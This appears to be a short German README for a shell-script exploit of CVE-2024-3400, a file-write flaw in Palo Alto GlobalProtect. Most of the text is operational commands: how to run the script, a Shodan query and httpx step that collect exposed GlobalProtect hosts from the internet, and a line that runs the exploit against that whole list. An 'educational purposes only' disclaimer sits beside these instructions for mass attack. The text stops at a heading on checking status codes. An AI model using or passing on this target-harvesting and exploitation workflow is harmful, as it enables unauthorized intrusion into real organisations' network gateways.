
Global Protec Palo Alto File-Write-Exploit
CVE-2024-3400 Palo Alto
Datei-Schreib-Exploit
Dieser Exploit durchsucht Global Protect URLs-Instanzen und versucht, eine Datei zu schreiben unter Verwendung von CVE-2024-3400
[ Mit Vorsicht verwenden ]
[ Nur für Bildungszwecke erstellt ]
Verwendung:
chmod +x gp-exploit.sh
./gp-exploit.sh dateiname_zum_schreiben urls.txt

Shodan-Suche & URL-Filterung:
# shodan search --fields ip_str,port 'http.html:"Global Protect"' --separator ":" | sed 's/.$//' > gp.hosts
# httpx -l gp.hosts
# ./gp-exploit dateiname gp.hosts
Überprüfung der Statuscode-Antworten:
